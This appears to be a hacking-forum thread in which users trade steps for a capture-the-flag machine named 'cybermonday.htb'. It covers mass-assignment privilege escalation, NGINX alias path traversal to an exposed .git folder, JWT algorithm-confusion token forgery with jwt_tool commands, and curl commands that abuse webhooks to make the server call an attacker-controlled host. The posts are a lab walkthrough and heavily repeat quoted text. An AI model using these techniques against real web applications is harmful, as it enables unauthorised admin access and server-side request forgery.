Posts: 18
Threads: 2
Joined: Aug 2023
Aug 20, 2023, 12:05 PM
(This post was last modified: Aug 20, 2023, 12:38 PM by Mandelio.
Edit Reason: Fixed phrasing
)
So, you can crush the update profile thing by passing an array to password, from there you can see how it updates the user. It passes the whole array. We know that the user has a key "isAdmin" so we can become admin by also passing in POST data "isAdmin=1".
After that we get access to the dashboard, from there we see the changelog.
From the changelog we get a virtual host.
These are all the available methods
{
"status":"success",
"message":{
"routes":{
"/auth/register":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/auth/login":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/webhooks":{
"method":"GET"
},
"/webhooks/create":{
"method":"POST",
"params":[
"name",
"description",
"action"
]
},
"/webhooks/delete:uuid":{
"method":"DELETE"
},
"/webhooks/:uuid":{
"method":"POST",
"actions":{
"sendRequest":{
"params":[
"url",
"method"
]
},
"createLogFile":{
"params":[
"log_name",
"log_content"
]
}
}
}
}
}
}
If we interact with the API we can register and it returns an X-Access-Token. It uses RS256 method to verify the signature.
We can get the JWKS object at /jwks.json
I tried with -X k option with jwt_tool (k = key confusion (specify public key with -pk)) (you can get the public key by verifying the signature of the original token, provide as args -V and -jw, this will generate the public key .pem file). I passed --injectclaims --payloadclaim "role" --payloadvalue "admin" (and obviously, the generated public key)
However I always get 403.
I tried passing the X-Access-Token both as value and as parameter. Doesn't work. Any ideas?
(Aug 20, 2023, 09:45 AM)redtaperecorder Wrote: (Aug 20, 2023, 02:42 AM)ByteBuster Wrote: There is a .git folder in /assets../.git. Upon examining the content, we can perform a mass assignment.
@if(auth()->user()->isAdmin)
+ <a href="{{ route('dashboard') }}"
to access the dashboard panel.
How did you find /assets.. ??
When you are looking for NGINX Alias Path Traversal, you first try with assets../ then with assets../../ and so on... when you have added enough ../ you will see that the error code will change from 404 to 400. That's how you can know if you got a NGINX Alias Path Traversal 
Posts: 2
Threads: 0
Joined: Aug 2023
Posts: 62
Threads: 1
Joined: Aug 2023
so anyone got any call back from SSRF? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 62
Threads: 1
Joined: Aug 2023
(Aug 20, 2023, 02:54 PM)ByteBuster Wrote: (Aug 20, 2023, 12:05 PM)Mandelio Wrote: So, you can crush the update profile thing by passing an array to password, from there you can see how it updates the user. It passes the whole array. We know that the user has a key "isAdmin" so we can become admin by also passing in POST data "isAdmin=1".
After that we get access to the dashboard, from there we see the changelog.
From the changelog we get a virtual host.
These are all the available methods
{
"status":"success",
"message":{
"routes":{
"/auth/register":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/auth/login":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/webhooks":{
"method":"GET"
},
"/webhooks/create":{
"method":"POST",
"params":[
"name",
"description",
"action"
]
},
"/webhooks/delete:uuid":{
"method":"DELETE"
},
"/webhooks/:uuid":{
"method":"POST",
"actions":{
"sendRequest":{
"params":[
"url",
"method"
]
},
"createLogFile":{
"params":[
"log_name",
"log_content"
]
}
}
}
}
}
}
We can get the JWKS object at /jwks.json
I tried with -X k option with jwt_tool (k = key confusion (specify public key with -pk)) (you can get the public key by verifying the signature of the original token, provide as args -V and -jw, this will generate the public key .pem file). I passed --injectclaims --payloadclaim "role" --payloadvalue "admin" (and obviously, the generated public key)
However I always get 403.
I tried passing the X-Access-Token both as value and as parameter. Doesn't work. Any ideas?
(Aug 20, 2023, 09:45 AM)redtaperecorder Wrote: (Aug 20, 2023, 02:42 AM)ByteBuster Wrote: There is a .git folder in /assets../.git. Upon examining the content, we can perform a mass assignment.
@if(auth()->user()->isAdmin)
+ <a href="{{ route('dashboard') }}"
to access the dashboard panel.
How did you find /assets.. ??
When you are looking for NGINX Alias Path Traversal, you first try with assets../ then with assets../../ and so on... when you have added enough ../ you will see that the error code will change from 404 to 400. That's how you can know if you got a NGINX Alias Path Traversal
You need to craft a new JWT token for admin:
{
"id": 1,
"username": "admin",
"role": "admin"
}
and use Algorithm Confusion attacks to switch the alg to HS256:
{
"typ": "JWT",
"alg": "HS256"
}
using:
python3 jwt_tool.py <JWT here> -S hs256 -k kid_0_1692488831.pem
with the new token you can create a new webhooks:
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create \
-H "x-access-token: Token-Here" \
-H "Content-Type: application/json" \
-d '{"name": "testing", "description": "testing", "action": "sendRequest", "url": "http://your-vpn-here"}'
that create a new webhooks uuid.
With the new uuid you can triggerit with :
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/new-uuid-here \
-H "x-access-token: jwt-here" \
-H "Content-Type: application/json" \
-d '{"action": "sendRequest", "url": "http://your-vpn-to-test", "method": "GET"}'
I got a connection back. But how to get a shell with that? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 17
Threads: 1
Joined: Aug 2023
Aug 20, 2023, 03:41 PM
(This post was last modified: Aug 20, 2023, 03:56 PM by HerVelizy.)
(Aug 20, 2023, 02:54 PM)ByteBuster Wrote: (Aug 20, 2023, 12:05 PM)Mandelio Wrote: So, you can crush the update profile thing by passing an array to password, from there you can see how it updates the user. It passes the whole array. We know that the user has a key "isAdmin" so we can become admin by also passing in POST data "isAdmin=1".
After that we get access to the dashboard, from there we see the changelog.
From the changelog we get a virtual host.
These are all the available methods
{
"status":"success",
"message":{
"routes":{
"/auth/register":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/auth/login":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/webhooks":{
"method":"GET"
},
"/webhooks/create":{
"method":"POST",
"params":[
"name",
"description",
"action"
]
},
"/webhooks/delete:uuid":{
"method":"DELETE"
},
"/webhooks/:uuid":{
"method":"POST",
"actions":{
"sendRequest":{
"params":[
"url",
"method"
]
},
"createLogFile":{
"params":[
"log_name",
"log_content"
]
}
}
}
}
}
}
We can get the JWKS object at /jwks.json
I tried with -X k option with jwt_tool (k = key confusion (specify public key with -pk)) (you can get the public key by verifying the signature of the original token, provide as args -V and -jw, this will generate the public key .pem file). I passed --injectclaims --payloadclaim "role" --payloadvalue "admin" (and obviously, the generated public key)
However I always get 403.
I tried passing the X-Access-Token both as value and as parameter. Doesn't work. Any ideas?
(Aug 20, 2023, 09:45 AM)redtaperecorder Wrote: (Aug 20, 2023, 02:42 AM)ByteBuster Wrote: There is a .git folder in /assets../.git. Upon examining the content, we can perform a mass assignment.
@if(auth()->user()->isAdmin)
+ <a href="{{ route('dashboard') }}"
to access the dashboard panel.
How did you find /assets.. ??
When you are looking for NGINX Alias Path Traversal, you first try with assets../ then with assets../../ and so on... when you have added enough ../ you will see that the error code will change from 404 to 400. That's how you can know if you got a NGINX Alias Path Traversal
You need to craft a new JWT token for admin:
{
"id": 1,
"username": "admin",
"role": "admin"
}
and use Algorithm Confusion attacks to switch the alg to HS256:
{
"typ": "JWT",
"alg": "HS256"
}
using:
python3 jwt_tool.py <JWT here> -S hs256 -k kid_0_1692488831.pem
with the new token you can create a new webhooks:
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create \
-H "x-access-token: Token-Here" \
-H "Content-Type: application/json" \
-d '{"name": "testing", "description": "testing", "action": "sendRequest", "url": "http://your-vpn-here"}'
that create a new webhooks uuid.
With the new uuid you can triggerit with :
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/new-uuid-here \
-H "x-access-token: jwt-here" \
-H "Content-Type: application/json" \
-d '{"action": "sendRequest", "url": "http://your-vpn-to-test", "method": "GET"}'
Where do you get kid_0_1692488831.pem ?
(Aug 20, 2023, 03:34 PM)wiener_peter Wrote: (Aug 20, 2023, 02:54 PM)ByteBuster Wrote: (Aug 20, 2023, 12:05 PM)Mandelio Wrote: So, you can crush the update profile thing by passing an array to password, from there you can see how it updates the user. It passes the whole array. We know that the user has a key "isAdmin" so we can become admin by also passing in POST data "isAdmin=1".
After that we get access to the dashboard, from there we see the changelog.
From the changelog we get a virtual host.
These are all the available methods
{
"status":"success",
"message":{
"routes":{
"/auth/register":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/auth/login":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/webhooks":{
"method":"GET"
},
"/webhooks/create":{
"method":"POST",
"params":[
"name",
"description",
"action"
]
},
"/webhooks/delete:uuid":{
"method":"DELETE"
},
"/webhooks/:uuid":{
"method":"POST",
"actions":{
"sendRequest":{
"params":[
"url",
"method"
]
},
"createLogFile":{
"params":[
"log_name",
"log_content"
]
}
}
}
}
}
}
We can get the JWKS object at /jwks.json
I tried with -X k option with jwt_tool (k = key confusion (specify public key with -pk)) (you can get the public key by verifying the signature of the original token, provide as args -V and -jw, this will generate the public key .pem file). I passed --injectclaims --payloadclaim "role" --payloadvalue "admin" (and obviously, the generated public key)
However I always get 403.
I tried passing the X-Access-Token both as value and as parameter. Doesn't work. Any ideas?
(Aug 20, 2023, 09:45 AM)redtaperecorder Wrote: (Aug 20, 2023, 02:42 AM)ByteBuster Wrote: There is a .git folder in /assets../.git. Upon examining the content, we can perform a mass assignment.
@if(auth()->user()->isAdmin)
+ <a href="{{ route('dashboard') }}"
to access the dashboard panel.
How did you find /assets.. ??
When you are looking for NGINX Alias Path Traversal, you first try with assets../ then with assets../../ and so on... when you have added enough ../ you will see that the error code will change from 404 to 400. That's how you can know if you got a NGINX Alias Path Traversal
You need to craft a new JWT token for admin:
{
"id": 1,
"username": "admin",
"role": "admin"
}
and use Algorithm Confusion attacks to switch the alg to HS256:
{
"typ": "JWT",
"alg": "HS256"
}
using:
python3 jwt_tool.py <JWT here> -S hs256 -k kid_0_1692488831.pem
with the new token you can create a new webhooks:
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create \
-H "x-access-token: Token-Here" \
-H "Content-Type: application/json" \
-d '{"name": "testing", "description": "testing", "action": "sendRequest", "url": "http://your-vpn-here"}'
that create a new webhooks uuid.
With the new uuid you can triggerit with :
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/new-uuid-here \
-H "x-access-token: jwt-here" \
-H "Content-Type: application/json" \
-d '{"action": "sendRequest", "url": "http://your-vpn-to-test", "method": "GET"}'
I got a connection back. But how to get a shell with that?
Couldn't we call Redis ? (I'm stuck at the webhook creation for now. It's my first time )
Posts: 62
Threads: 1
Joined: Aug 2023
(Aug 20, 2023, 04:36 PM)M3Y Wrote: how I can get shell?
idk how to get a shell This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 10
Threads: 1
Joined: Aug 2023
Posts: 10
Threads: 0
Joined: Aug 2023
(Aug 20, 2023, 06:38 PM)k1ng5h4rk Wrote: (Aug 20, 2023, 02:54 PM)ByteBuster Wrote: (Aug 20, 2023, 12:05 PM)Mandelio Wrote: So, you can crush the update profile thing by passing an array to password, from there you can see how it updates the user. It passes the whole array. We know that the user has a key "isAdmin" so we can become admin by also passing in POST data "isAdmin=1".
After that we get access to the dashboard, from there we see the changelog.
From the changelog we get a virtual host.
These are all the available methods
{
"status":"success",
"message":{
"routes":{
"/auth/register":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/auth/login":{
"method":"POST",
"params":[
"username",
"password"
]
},
"/webhooks":{
"method":"GET"
},
"/webhooks/create":{
"method":"POST",
"params":[
"name",
"description",
"action"
]
},
"/webhooks/delete:uuid":{
"method":"DELETE"
},
"/webhooks/:uuid":{
"method":"POST",
"actions":{
"sendRequest":{
"params":[
"url",
"method"
]
},
"createLogFile":{
"params":[
"log_name",
"log_content"
]
}
}
}
}
}
}
We can get the JWKS object at /jwks.json
I tried with -X k option with jwt_tool (k = key confusion (specify public key with -pk)) (you can get the public key by verifying the signature of the original token, provide as args -V and -jw, this will generate the public key .pem file). I passed --injectclaims --payloadclaim "role" --payloadvalue "admin" (and obviously, the generated public key)
However I always get 403.
I tried passing the X-Access-Token both as value and as parameter. Doesn't work. Any ideas?
(Aug 20, 2023, 09:45 AM)redtaperecorder Wrote: (Aug 20, 2023, 02:42 AM)ByteBuster Wrote: There is a .git folder in /assets../.git. Upon examining the content, we can perform a mass assignment.
@if(auth()->user()->isAdmin)
+ <a href="{{ route('dashboard') }}"
to access the dashboard panel.
How did you find /assets.. ??
When you are looking for NGINX Alias Path Traversal, you first try with assets../ then with assets../../ and so on... when you have added enough ../ you will see that the error code will change from 404 to 400. That's how you can know if you got a NGINX Alias Path Traversal
You need to craft a new JWT token for admin:
{
"id": 1,
"username": "admin",
"role": "admin"
}
and use Algorithm Confusion attacks to switch the alg to HS256:
{
"typ": "JWT",
"alg": "HS256"
}
using:
python3 jwt_tool.py <JWT here> -S hs256 -k kid_0_1692488831.pem
with the new token you can create a new webhooks:
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create \
-H "x-access-token: Token-Here" \
-H "Content-Type: application/json" \
-d '{"name": "testing", "description": "testing", "action": "sendRequest", "url": "http://your-vpn-here"}'
that create a new webhooks uuid.
With the new uuid you can triggerit with :
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/new-uuid-here \
-H "x-access-token: jwt-here" \
-H "Content-Type: application/json" \
-d '{"action": "sendRequest", "url": "http://your-vpn-to-test", "method": "GET"}'
it keeps giving me this error message while creating a new web hook
{"status":"error","message":"\"name\" not defined"}
Define content type header: -H 'Content-Type: application/json'
Posts: 42
Threads: 2
Joined: Aug 2023
Some help to get Shell or something in user?. Webhooks hit my machine.. but i have not idea what to do.
Posts: 32
Threads: 0
Joined: Jul 2023
(Aug 21, 2023, 05:11 AM)IXNovaticula Wrote: I can't seem to find the jwks.json file that you keep mentioning, the server says that that file is not found.
curl "http://webhooks-api-beta.cybermonday.htb/jwks.json" This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
|
